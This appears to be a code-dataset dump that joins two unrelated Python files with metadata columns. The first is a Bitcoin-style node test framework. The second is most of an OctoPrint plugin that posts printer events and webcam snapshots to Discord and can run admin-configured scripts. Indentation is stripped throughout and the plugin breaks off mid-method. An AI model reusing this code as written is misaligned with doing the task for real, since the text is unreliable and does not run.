# Timestamp is Dec. 1st, 2019 at 00:00:00
TIMESTAMP_IN_THE_PAST = 1575158400
class SkipTest(Exception):
"""This exception is raised to skip a test"""
def __init__(self, message):
self.message = message
class BitcoinTestFramework():
"""Base class for a bitcoin test script.
Individual bitcoin test scripts should subclass this class and override the set_test_params() and run_test() methods.
Individual tests can also override the following methods to customize the test setup:
- add_options()
- setup_chain()
- setup_network()
- setup_nodes()
The __init__() and main() methods should not be overridden.
This class also contains various public and private helper methods."""
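# A minimal subclass sketch (class name and values are illustrative only):
#   class ExampleTest(BitcoinTestFramework):
#       def set_test_params(self):
#           self.num_nodes = 1
#           self.setup_clean_chain = True
#       def run_test(self):
#           node = self.nodes[0]
#           node.generatetoaddress(1, node.get_deterministic_priv_key().address)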
def __init__(self):
"""Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
self.setup_clean_chain = False
self.nodes = []
self.network_thread = None
self.mocktime = 0
# Wait for up to 60 seconds for the RPC server to respond
self.rpc_timeout = 60
self.supports_cli = False
self.bind_to_localhost_only = True
def main(self):
"""Main function. This should not be overridden by the subclass test scripts."""
parser = argparse.ArgumentParser(usage="%(prog)s [options]")
parser.add_argument("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave bitcoinds and test.* datadir on exit or error")
parser.add_argument("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop bitcoinds after the test execution")
parser.add_argument("--cachedir", dest="cachedir", default=os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
help="Directory for caching pregenerated datadirs (default: %(default)s)")
parser.add_argument("--tmpdir", dest="tmpdir",
help="Root directory for datadirs")
parser.add_argument("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_argument("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_argument("--portseed", dest="port_seed", default=os.getpid(), type=int,
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_argument("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_argument("--configfile", dest="configfile", default=os.path.abspath(os.path.dirname(os.path.realpath(
__file__)) + "/../../config.ini"), help="Location of the test framework config file (default: %(default)s)")
parser.add_argument("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
help="Attach a python debugger if test fails")
parser.add_argument("--usecli", dest="usecli", default=False, action="store_true",
help="use bitcoin-cli instead of RPC for all commands")
parser.add_argument("--with-phononactivation", dest="phononactivation", default=False, action="store_true",
help="Activate phonon update on timestamp {}".format(TIMESTAMP_IN_THE_PAST))
self.add_options(parser)
self.options = parser.parse_args()
self.set_test_params()
assert hasattr(
self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
PortSeed.n = self.options.port_seed
check_json_precision()
self.options.cachedir = os.path.abspath(self.options.cachedir)
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
self.options.bitcoind = os.getenv(
"BITCOIND", default=config["environment"]["BUILDDIR"] + '/src/bitcoind' + config["environment"]["EXEEXT"])
self.options.bitcoincli = os.getenv(
"BITCOINCLI", default=config["environment"]["BUILDDIR"] + '/src/bitcoin-cli' + config["environment"]["EXEEXT"])
os.environ['PATH'] = config['environment']['BUILDDIR'] + os.pathsep + \
config['environment']['BUILDDIR'] + os.path.sep + "qt" + os.pathsep + \
os.environ['PATH']
# Set up temp directory and start logging
if self.options.tmpdir:
self.options.tmpdir = os.path.abspath(self.options.tmpdir)
os.makedirs(self.options.tmpdir, exist_ok=False)
else:
self.options.tmpdir = tempfile.mkdtemp(prefix="test")
self._start_logging()
self.log.debug('Setting up network thread')
self.network_thread = NetworkThread()
self.network_thread.start()
success = TestStatus.FAILED
try:
if self.options.usecli and not self.supports_cli:
raise SkipTest(
"--usecli specified but test does not support using CLI")
self.skip_test_if_missing_module()
self.setup_chain()
self.setup_network()
self.import_deterministic_coinbase_privkeys()
self.run_test()
success = TestStatus.PASSED
except JSONRPCException:
self.log.exception("JSONRPC error")
except SkipTest as e:
self.log.warning("Test Skipped: {}".format(e.message))
success = TestStatus.SKIPPED
except AssertionError:
self.log.exception("Assertion failed")
except KeyError:
self.log.exception("Key error")
except Exception:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt:
self.log.warning("Exiting after keyboard interrupt")
if success == TestStatus.FAILED and self.options.pdbonfailure:
print("Testcase failed. Attaching python debugger. Enter ? for help")
pdb.set_trace()
self.log.debug('Closing down network thread')
self.network_thread.close()
if not self.options.noshutdown:
self.log.info("Stopping nodes")
if self.nodes:
self.stop_nodes()
else:
for node in self.nodes:
node.cleanup_on_exit = False
self.log.info(
"Note: bitcoinds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
self.log.info("Cleaning up {} on exit".format(self.options.tmpdir))
cleanup_tree_on_exit = True
else:
self.log.warning(
"Not cleaning up dir {}".format(self.options.tmpdir))
cleanup_tree_on_exit = False
if success == TestStatus.PASSED:
self.log.info("Tests successful")
exit_code = TEST_EXIT_PASSED
elif success == TestStatus.SKIPPED:
self.log.info("Test skipped")
exit_code = TEST_EXIT_SKIPPED
else:
self.log.error(
"Test failed. Test logging available at {}/test_framework.log".format(self.options.tmpdir))
self.log.error("Hint: Call {} '{}' to consolidate all logs".format(os.path.normpath(
os.path.dirname(os.path.realpath(__file__)) + "/../combine_logs.py"), self.options.tmpdir))
exit_code = TEST_EXIT_FAILED
logging.shutdown()
if cleanup_tree_on_exit:
shutil.rmtree(self.options.tmpdir)
sys.exit(exit_code)
# Methods to override in subclass test scripts.
def set_test_params(self):
"""Tests must this method to change default values for number of nodes, topology, etc"""
raise NotImplementedError
def add_options(self, parser):
"""Override this method to add command-line options to the test"""
pass
def skip_test_if_missing_module(self):
"""Override this method to skip a test if a module is not compiled"""
pass
def setup_chain(self):
"""Override this method to customize blockchain setup"""
self.log.info("Initializing test directory " + self.options.tmpdir)
if self.setup_clean_chain:
self._initialize_chain_clean()
else:
self._initialize_chain()
def setup_network(self):
"""Override this method to customize test network topology"""
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes[i], self.nodes[i + 1])
self.sync_all()
def setup_nodes(self):
"""Override this method to customize test node setup"""
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
def import_deterministic_coinbase_privkeys(self):
if self.setup_clean_chain:
return
for n in self.nodes:
try:
n.getwalletinfo()
except JSONRPCException as e:
assert str(e).startswith('Method not found')
continue
n.importprivkey(n.get_deterministic_priv_key().key)
def run_test(self):
"""Tests must override this method to define test logic"""
raise NotImplementedError
# Public helper methods. These can be accessed by the subclass test
# scripts.
def add_nodes(self, num_nodes, extra_args=None,
*, rpchost=None, binary=None):
"""Instantiate TestNode objects.
Should only be called once after the nodes have been specified in
set_test_params()."""
if self.bind_to_localhost_only:
extra_confs = [["bind=127.0.0.1"]] * num_nodes
else:
extra_confs = [[]] * num_nodes
if extra_args is None:
extra_args = [[]] * num_nodes
if binary is None:
binary = [self.options.bitcoind] * num_nodes
assert_equal(len(extra_confs), num_nodes)
assert_equal(len(extra_args), num_nodes)
assert_equal(len(binary), num_nodes)
for i in range(num_nodes):
self.nodes.append(TestNode(
i,
get_datadir_path(self.options.tmpdir, i),
host=rpchost,
rpc_port=rpc_port(i),
p2p_port=p2p_port(i),
timewait=self.rpc_timeout,
bitcoind=binary[i],
bitcoin_cli=self.options.bitcoincli,
mocktime=self.mocktime,
coverage_dir=self.options.coveragedir,
extra_conf=extra_confs[i],
extra_args=extra_args[i],
use_cli=self.options.usecli,
))
if self.options.phononactivation:
self.nodes[i].extend_default_args(
["-phononactivationtime={}".format(TIMESTAMP_IN_THE_PAST)])
def start_node(self, i, *args, **kwargs):
"""Start a bitcoind"""
node = self.nodes[i]
node.start(*args, **kwargs)
node.wait_for_rpc_connection()
if self.options.coveragedir is not None:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def start_nodes(self, extra_args=None, *args, **kwargs):
"""Start multiple bitcoinds"""
if extra_args is None:
extra_args = [None] * self.num_nodes
assert_equal(len(extra_args), self.num_nodes)
try:
for i, node in enumerate(self.nodes):
node.start(extra_args[i], *args, **kwargs)
for node in self.nodes:
node.wait_for_rpc_connection()
except BaseException:
# If one node failed to start, stop the others
self.stop_nodes()
raise
if self.options.coveragedir is not None:
for node in self.nodes:
coverage.write_all_rpc_commands(
self.options.coveragedir, node.rpc)
def stop_node(self, i, expected_stderr='', wait=0):
"""Stop a bitcoind test node"""
self.nodes[i].stop_node(expected_stderr, wait=wait)
self.nodes[i].wait_until_stopped()
def stop_nodes(self, wait=0):
"""Stop multiple bitcoind test nodes"""
for node in self.nodes:
# Issue RPC to stop nodes
node.stop_node(wait=wait)
for node in self.nodes:
# Wait for nodes to stop
node.wait_until_stopped()
def restart_node(self, i, extra_args=None):
"""Stop and start a test node"""
self.stop_node(i)
self.start_node(i, extra_args)
def wait_for_node_exit(self, i, timeout):
self.nodes[i].process.wait(timeout)
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], self.nodes[2])
disconnect_nodes(self.nodes[2], self.nodes[1])
self.sync_all([self.nodes[:2], self.nodes[2:]])
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes[1], self.nodes[2])
self.sync_all()
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
for group in node_groups:
sync_blocks(group)
sync_mempools(group)
# Private helper methods. These should not be accessed by the subclass
# test scripts.
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(
self.options.tmpdir + '/test_framework.log', encoding='utf-8')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this
# logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel
# was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit(
) else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as bitcoind's debug.log with microprecision (so
# log files can be concatenated and sorted)
formatter = logging.Formatter(
fmt='%(asctime)s.%(msecs)03d000Z %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("BitcoinRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
def _initialize_chain(self):
"""Initialize a pre-mined blockchain for use by the test.
Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
Afterward, create num_nodes copies from the cache."""
assert self.num_nodes <= MAX_NODES
create_cache = False
for i in range(MAX_NODES):
if not os.path.isdir(get_datadir_path(self.options.cachedir, i)):
create_cache = True
break
if create_cache:
self.log.debug("Creating data directories from cached datadir")
# find and delete old cache directories if any exist
for i in range(MAX_NODES):
if os.path.isdir(get_datadir_path(self.options.cachedir, i)):
shutil.rmtree(get_datadir_path(self.options.cachedir, i))
# Create cache directories, run bitcoinds:
for i in range(MAX_NODES):
datadir = initialize_datadir(self.options.cachedir, i)
self.nodes.append(TestNode(
i,
get_datadir_path(self.options.cachedir, i),
extra_conf=["bind=127.0.0.1"],
extra_args=[],
host=None,
rpc_port=rpc_port(i),
p2p_port=p2p_port(i),
timewait=self.rpc_timeout,
bitcoind=self.options.bitcoind,
bitcoin_cli=self.options.bitcoincli,
mocktime=self.mocktime,
coverage_dir=None
))
self.nodes[i].clear_default_args()
self.nodes[i].extend_default_args(["-datadir=" + datadir])
self.nodes[i].extend_default_args(["-disablewallet"])
if i > 0:
self.nodes[i].extend_default_args(
["-connect=127.0.0.1:" + str(p2p_port(0))])
if self.options.phononactivation:
self.nodes[i].extend_default_args(
["-phononactivationtime={}".format(TIMESTAMP_IN_THE_PAST)])
self.start_node(i)
# Wait for RPC connections to be ready
for node in self.nodes:
node.wait_for_rpc_connection()
# For backward compatibility of the python scripts with previous
# versions of the cache, set mocktime to Jan 1,
# 2014 + (201 * 10 * 60)
self.mocktime = 1388534400 + (201 * 10 * 60)
# Create a 200-block-long chain; each of the 4 first nodes
# gets 25 mature blocks and 25 immature.
# Note: To preserve compatibility with older versions of
# initialize_chain, only 4 nodes will generate coins.
#
# blocks are created with timestamps 10 minutes apart
# starting from 2010 minutes in the past
block_time = self.mocktime - (201 * 10 * 60)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(self.nodes, block_time)
self.nodes[peer].generatetoaddress(
1, self.nodes[peer].get_deterministic_priv_key().address)
block_time += 10 * 60
# Must sync before next peer starts generating blocks
sync_blocks(self.nodes)
# Shut them down, and clean up cache directories:
self.stop_nodes()
self.nodes = []
self.mocktime = 0
def cache_path(n, *paths):
return os.path.join(get_datadir_path(
self.options.cachedir, n), "regtest", *paths)
for i in range(MAX_NODES):
# Remove empty wallets dir
os.rmdir(cache_path(i, 'wallets'))
for entry in os.listdir(cache_path(i)):
if entry not in ['chainstate', 'blocks']:
os.remove(cache_path(i, entry))
for i in range(self.num_nodes):
from_dir = get_datadir_path(self.options.cachedir, i)
to_dir = get_datadir_path(self.options.tmpdir, i)
shutil.copytree(from_dir, to_dir)
# Overwrite port/rpcport in bitcoin.conf
initialize_datadir(self.options.tmpdir, i)
def _initialize_chain_clean(self):
"""Initialize empty blockchain for use by the test.
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization."""
for i in range(self.num_nodes):
initialize_datadir(self.options.tmpdir, i)
def skip_if_no_py3_zmq(self):
"""Attempt to import the zmq package and skip the test if the import fails."""
try:
import zmq # noqa
except ImportError:
raise SkipTest("python3-zmq module not available.")
def skip_if_no_bitcoind_zmq(self):
"""Skip the running test if bitcoind has not been compiled with zmq support."""
if not self.is_zmq_compiled():
raise SkipTest("bitcoind has not been built with zmq enabled.")
def skip_if_no_wallet(self):
"""Skip the running test if wallet has not been compiled."""
if not self.is_wallet_compiled():
raise SkipTest("wallet has not been compiled.")
def skip_if_no_cli(self):
"""Skip the running test if bitcoin-cli has not been compiled."""
if not self.is_cli_compiled():
raise SkipTest("bitcoin-cli has not been compiled.")
def is_cli_compiled(self):
"""Checks whether bitcoin-cli was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
return config["components"].getboolean("ENABLE_UTILS")
def is_wallet_compiled(self):
"""Checks whether the wallet module was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
return config["components"].getboolean("ENABLE_WALLET")
def is_zmq_compiled(self):
"""Checks whether the zmq module was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
return config["components"].getboolean("ENABLE_ZMQ")
| []
| []
| [
"BITCOINCLI",
"PATH",
"BITCOIND"
]
| [] | ["BITCOINCLI", "PATH", "BITCOIND"] | python | 3 | 0 | |
octoprint_discordremote/__init__.py | # coding=utf-8
from __future__ import absolute_import
import threading
import time
from base64 import b64decode
from datetime import timedelta, datetime
import humanfriendly
import octoprint.plugin
import octoprint.settings
import os
import requests
import socket
import subprocess
import logging
from PIL import Image
from flask import make_response
from io import BytesIO
from octoprint.server import user_permission
from requests import ConnectionError
from threading import Thread, Event
from octoprint_discordremote.libs import ipgetter
from octoprint_discordremote.command import Command
from octoprint_discordremote import embedbuilder
from octoprint_discordremote.embedbuilder import info_embed
from .discord import Discord
class DiscordRemotePlugin(octoprint.plugin.EventHandlerPlugin,
octoprint.plugin.StartupPlugin,
octoprint.plugin.ShutdownPlugin,
octoprint.plugin.SettingsPlugin,
octoprint.plugin.AssetPlugin,
octoprint.plugin.TemplatePlugin,
octoprint.plugin.ProgressPlugin,
octoprint.plugin.SimpleApiPlugin):
def __init__(self):
self.discord = None
self.command = None
self.last_progress_message = None
self.last_progress_percent = 0
self.is_muted = False
self.periodic_signal = None
self.periodic_thread = None
# Events definition here (better for intellisense in IDE)
# referenced in the settings too.
self.events = {
"startup": {
"name": "Octoprint Startup",
"enabled": True,
"with_snapshot": False,
"message": "⏰ I just woke up! What are we gonna print today?\n"
"Local IP: {ipaddr} External IP: {externaddr}"
},
"shutdown": {
"name": "Octoprint Shutdown",
"enabled": True,
"with_snapshot": False,
"message": "💤 Going to bed now!"
},
"printer_state_operational": {
"name": "Printer state : operational",
"enabled": True,
"with_snapshot": False,
"message": "✅ Your printer is operational."
},
"printer_state_error": {
"name": "Printer state : error",
"enabled": True,
"with_snapshot": False,
"message": "⚠️ Your printer is in an erroneous state."
},
"printer_state_unknown": {
"name": "Printer state : unknown",
"enabled": True,
"with_snapshot": False,
"message": "❔ Your printer is in an unknown state."
},
"printing_started": {
"name": "Printing process : started",
"enabled": True,
"with_snapshot": True,
"message": "🖨️ I've started printing {path}"
},
"printing_paused": {
"name": "Printing process : paused",
"enabled": True,
"with_snapshot": True,
"message": "⏸️ The printing was paused."
},
"printing_resumed": {
"name": "Printing process : resumed",
"enabled": True,
"with_snapshot": True,
"message": "▶️ The printing was resumed."
},
"printing_cancelled": {
"name": "Printing process : cancelled",
"enabled": True,
"with_snapshot": True,
"message": "🛑 The printing was stopped."
},
"printing_done": {
"name": "Printing process : done",
"enabled": True,
"with_snapshot": True,
"message": "👍 Printing is done! Took about {time_formatted}"
},
"printing_failed": {
"name": "Printing process : failed",
"enabled": True,
"with_snapshot": True,
"message": "👎 Printing has failed! :("
},
"printing_progress": {
"name": "Printing progress (Percentage)",
"enabled": True,
"with_snapshot": True,
"message": "📢 Printing is at {progress}%",
"step": 10
},
"printing_progress_periodic": {
"name": "Printing progress (Periodic)",
"enabled": False,
"with_snapshot": True,
"message": "📢 Printing is at {progress}%",
"period": 300
},
"test": { # Not a real message, but we will treat it as one
"enabled": True,
"with_snapshot": True,
"message": "Hello hello! If you see this message, it means that the settings are correct!"
},
}
self.permissions = {
'1': {'users': '*', 'commands': ''},
'2': {'users': '', 'commands': ''},
'3': {'users': '', 'commands': ''},
'4': {'users': '', 'commands': ''},
'5': {'users': '', 'commands': ''}
}
def configure_discord(self, send_test=False):
# Configure discord
if self.command is None:
self.command = Command(self)
if self.discord is None:
self.discord = Discord()
self.discord.configure_discord(self._settings.get(['bottoken'], merged=True),
self._settings.get(['channelid'], merged=True),
self._logger,
self.command,
self.update_discord_status)
if send_test:
self.notify_event("test")
def on_after_startup(self):
# Use a different log file for DiscordRemote, as it is very noisy.
self._logger = logging.getLogger("octoprint.plugins.discordremote")
from octoprint.logging.handlers import CleaningTimedRotatingFileHandler
hdlr = CleaningTimedRotatingFileHandler(
self._settings.get_plugin_logfile_path(), when="D", backupCount=3)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
self._logger.addHandler(hdlr)
# Initialise DiscordRemote
self._logger.info("DiscordRemote is started !")
self.configure_discord(False)
# Transition settings
allowed_users = self._settings.get(['allowedusers'], merged=True)
if allowed_users:
self._settings.set(["allowedusers"], None, True)
self._settings.set(['permissions'], {'1': {'users': allowed_users, 'commands': ''}}, True)
self.send_message(None, "⚠️⚠️⚠️ Allowed users has been changed to a more granular system. "
"Check the DiscordRemote settings and check that it is suitable⚠️⚠️⚠️")
# ShutdownPlugin mixin
def on_shutdown(self):
self._logger.info("DiscordRemote is shutting down.")
self.discord.shutdown_discord()
self._logger.info("Discord bot has excited cleanly.")
# SettingsPlugin mixin
def get_settings_defaults(self):
return {
'bottoken': "",
'channelid': "",
'baseurl': "",
'prefix': "/",
'show_local_ip': 'auto',
'show_external_ip': 'auto',
'use_hostname': False,
'hostname': "YOUR.HOST.NAME",
'use_hostname_only': False,
'events': self.events,
'permissions': self.permissions,
'allow_scripts': False,
'script_before': '',
'script_after': '',
'allowed_gcode': ''
}
# Restricts some paths to some roles only
def get_settings_restricted_paths(self):
# settings.events.tests is a false message, so we should never see it as configurable.
# settings.bottoken and channelid are admin only.
return dict(never=[["events", "test"]],
admin=[["bottoken"],
["channelid"],
["permissions"],
['baseurl'],
['prefix'],
["show_local_ip"],
["show_external_ip"],
["use_hostname"],
["hostname"],
["use_hostname_only"],
['script_before'],
['script_after'],
['allowed_gcode']])
# AssetPlugin mixin
def get_assets(self):
# Define your plugin's asset files to automatically include in the
# core UI here.
return dict(
js=["js/discordremote.js"],
css=["css/discordremote.css"],
less=["less/discordremote.less"]
)
# TemplatePlugin mixin
def get_template_configs(self):
return [
dict(type="settings", custom_bindings=False)
]
# Softwareupdate hook
def get_update_information(self):
# Define the configuration for your plugin to use with the Software Update
# Plugin here. See https://github.com/foosel/OctoPrint/wiki/Plugin:-Software-Update
# for details.
return dict(
discordremote=dict(
displayName="DiscordRemote Plugin",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="cameroncros",
repo="OctoPrint-DiscordRemote",
current=self._plugin_version,
# update method: pip
pip="https://github.com/cameroncros/OctoPrint-DiscordRemote/archive/{target_version}.zip"
)
)
# EventHandlerPlugin hook
def on_event(self, event, payload):
if event == "Startup":
return self.notify_event("startup")
if event == "Shutdown":
return self.notify_event("shutdown")
if event == "PrinterStateChanged":
if payload["state_id"] == "OPERATIONAL":
return self.notify_event("printer_state_operational")
elif payload["state_id"] == "ERROR":
return self.notify_event("printer_state_error")
elif payload["state_id"] == "UNKNOWN":
return self.notify_event("printer_state_unknown")
if event == "PrintStarted":
self.start_periodic_reporting()
return self.notify_event("printing_started", payload)
if event == "PrintPaused":
return self.notify_event("printing_paused", payload)
if event == "PrintResumed":
return self.notify_event("printing_resumed", payload)
if event == "PrintCancelled":
return self.notify_event("printing_cancelled", payload)
if event == "PrintDone":
self.stop_periodic_reporting()
payload['time_formatted'] = timedelta(seconds=int(payload["time"]))
return self.notify_event("printing_done", payload)
return True
def on_print_progress(self, location, path, progress):
# Avoid sending duplicate percentage progress messages
if progress != self.last_progress_percent:
self.last_progress_percent = progress
self.notify_event("printing_progress", {"progress": progress})
def on_settings_save(self, data):
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
self._logger.info("Settings have saved. Send a test message...")
thread = threading.Thread(target=self.configure_discord, args=(True,))
thread.start()
# SimpleApiPlugin mixin
def get_api_commands(self):
return dict(
executeCommand=['args'],
sendMessage=[]
)
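# These commands are served through OctoPrint's SimpleApiPlugin endpoint; a
# hedged example of invoking one over HTTP (plugin identifier assumed to be
# "discordremote", args value is a placeholder):
#   POST /api/plugin/discordremote
#   {"command": "executeCommand", "args": "<discord command string>"}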
def on_api_command(self, comm, data):
if not user_permission.can():
return make_response("Insufficient rights", 403)
if comm == 'executeCommand':
return self.execute_command(data)
if comm == 'sendMessage':
return self.unpack_message(data)
def execute_command(self, data):
args = ""
if 'args' in data:
args = data['args']
snapshots, embeds = self.command.parse_command(args)
if not self.discord.send(snapshots=snapshots, embeds=embeds):
return make_response("Failed to send message", 404)
def unpack_message(self, data):
builder = embedbuilder.EmbedBuilder()
if 'title' in data:
builder.set_title(data['title'])
if 'author' in data:
builder.set_author(data['author'])
if 'color' in data:
builder.set_color(data['color'])
if 'description' in data:
builder.set_description(data['description'])
if 'image' in data:
b64image = data['image']
imagename = data.get('imagename', 'snapshot.png')
bytes = b64decode(b64image)
image = BytesIO(bytes)
builder.set_image((imagename, image))
if not self.discord.send(embeds=builder.get_embeds()):
return make_response("Failed to send message", 404)
def notify_event(self, event_id, data=None):
self._logger.info("Received event: %s" % event_id)
if self.is_muted:
return True
if data is None:
data = {}
if event_id not in self.events:
self._logger.error("Tried to notify on non-existant eventID : ", event_id)
return False
tmp_config = self._settings.get(["events", event_id], merged=True)
if not tmp_config["enabled"]:
self._logger.debug("Event {} is not enabled. Returning gracefully".format(event_id))
return False
# Store IP address for message
data['ipaddr'] = self.get_ip_address()
data['externaddr'] = self.get_external_ip_address()
data['timeremaining'] = self.get_print_time_remaining()
data['timespent'] = self.get_print_time_spent()
# Special case for progress eventID : we check for progress and steps
if event_id == 'printing_progress':
# Skip if just started
if int(data["progress"]) == 0:
return False
# Skip if not a multiple of the given interval
if int(data["progress"]) % int(tmp_config["step"]) != 0:
return False
# Always send last message, and reset timer.
if int(data["progress"]) == 100:
self.last_progress_message = None
done_config = self._settings.get(["events", "printing_done"], merged=True)
# Don't send last message if the "printing_done" event is enabled.
if done_config["enabled"]:
return False
# Otherwise work out if time since last message has passed.
try:
min_progress_time = timedelta(seconds=int(tmp_config["timeout"]))
if self.last_progress_message is not None \
and self.last_progress_message > (datetime.now() - min_progress_time):
return False
except ValueError:
pass
except KeyError:
pass
self.last_progress_message = datetime.now()
return self.send_message(event_id, tmp_config["message"].format(**data), tmp_config["with_snapshot"])
def get_ip_address(self):
if self._settings.get(['show_local_ip'], merged=True) == 'hostname':
return self._settings.get(['hostname'], merged=True)
elif self._settings.get(['show_local_ip'], merged=True) == 'auto':
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
return s.getsockname()[0]
except Exception as e:
print(e)
return '127.0.0.1'
finally:
s.close()
else:
return None
def get_external_ip_address(self):
if self._settings.get(['show_external_ip'], merged=True) == 'hostname':
return self._settings.get(['hostname'], merged=True)
elif self._settings.get(['show_external_ip'], merged=True) == 'auto':
return ipgetter.myip()
else:
return None
def get_port(self):
port = self.get_settings().global_get(["plugins", "discovery", "publicPort"])
if port:
return port
port = self.get_settings().global_get(["server", "port"])
if port:
return port
return 5000 # Default to a sane value
def exec_script(self, event_name, which=""):
# I want to be sure that the scripts are allowed by the special configuration flag
scripts_allowed = self._settings.get(["allow_scripts"], merged=True)
if scripts_allowed is None or scripts_allowed is False:
return ""
# Finding which one should be used.
script_to_exec = None
if which == "before":
script_to_exec = self._settings.get(["script_before"], merged=True)
elif which == "after":
script_to_exec = self._settings.get(["script_after"], merged=True)
# Finally exec the script
out = ""
self._logger.info("{}:{} File to start: '{}'".format(event_name, which, script_to_exec))
try:
if script_to_exec is not None and len(script_to_exec) > 0 and os.path.exists(script_to_exec):
out = subprocess.check_output(script_to_exec)
except (OSError, subprocess.CalledProcessError) as err:
out = err
finally:
self._logger.info("{}:{} > Output: '{}'".format(event_name, which, out))
return out
def send_message(self, event_id, message, with_snapshot=False):
# exec "before" script if any
self.exec_script(event_id, "before")
# Get snapshot if asked for
snapshot = None
if with_snapshot:
snapshots = self.get_snapshot()
if snapshots and len(snapshots) == 1:
snapshot = snapshots[0]
# Send to Discord bot (Somehow events can happen before discord bot has been created and initialised)
if self.discord is None:
self.discord = Discord()
out = self.discord.send(embeds=info_embed(author=self.get_printer_name(),
title=message,
snapshot=snapshot))
if not out:
self._logger.error("Failed to send message")
return out
# exec "after" script if any
self.exec_script(event_id, "after")
return out
def get_snapshot(self):
if 'FAKE_SNAPSHOT' in os.environ:
return self.get_snapshot_fake()
else:
return self.get_snapshot_camera()
@staticmethod
def get_snapshot_fake():
fl = open(os.environ['FAKE_SNAPSHOT'], "rb")
return [("snapshot.png", fl)]
def get_snapshot_camera(self):
snapshot = None
snapshot_url = self._settings.global_get(["webcam", "snapshot"])
if snapshot_url is None:
return None
if "http" in snapshot_url:
try:
snapshot_call = requests.get(snapshot_url)
if not snapshot_call:
return None
snapshot = BytesIO(snapshot_call.content)
except ConnectionError:
return None
if snapshot_url.startswith("file://"):
snapshot = open(snapshot_url.partition('file://')[2], "rb")
if snapshot is None:
return None
# Get the settings used for streaming to know if we should transform the snapshot
must_flip_h = self._settings.global_get_boolean(["webcam", "flipH"])
must_flip_v = self._settings.global_get_boolean(["webcam", "flipV"])
must_rotate = self._settings.global_get_boolean(["webcam", "rotate90"])
# Only call Pillow if we need to transpose anything
if must_flip_h or must_flip_v or must_rotate:
img = Image.open(snapshot)
self._logger.info(
"Transformations : FlipH={}, FlipV={} Rotate={}".format(must_flip_h, must_flip_v, must_rotate))
if must_flip_h:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
if must_flip_v:
img = img.transpose(Image.FLIP_TOP_BOTTOM)
if must_rotate:
img = img.transpose(Image.ROTATE_90)
new_image = BytesIO()
img.save(new_image, 'png')
return [("snapshot.png", new_image)]
return [("snapshot.png", snapshot)]
def get_printer_name(self):
printer_name = self._settings.global_get(["appearance", "name"])
if printer_name is None:
printer_name = "OctoPrint"
return printer_name
def update_discord_status(self, connected):
self._plugin_manager.send_plugin_message(self._identifier, dict(isConnected=connected))
def mute(self):
self.is_muted = True
def unmute(self):
self.is_muted = False
def get_file_manager(self):
return self._file_manager
def get_settings(self):
return self._settings
def get_printer(self):
return self._printer
def get_plugin_manager(self):
return self._plugin_manager
def get_print_time_spent(self):
current_data = self._printer.get_current_data()
try:
current_time_val = current_data['progress']['printTime']
return humanfriendly.format_timespan(current_time_val, max_units=2)
except (KeyError, ValueError):
return 'Unknown'
def get_print_time_remaining(self):
current_data = self._printer.get_current_data()
try:
remaining_time_val = current_data['progress']['printTimeLeft']
return humanfriendly.format_timespan(remaining_time_val, max_units=2)
except (KeyError, ValueError):
return 'Unknown'
def start_periodic_reporting(self):
self.stop_periodic_reporting()
self.last_progress_percent = 0
self.periodic_signal = Event()
self.periodic_signal.clear()
self.periodic_thread = Thread(target=self.periodic_reporting)
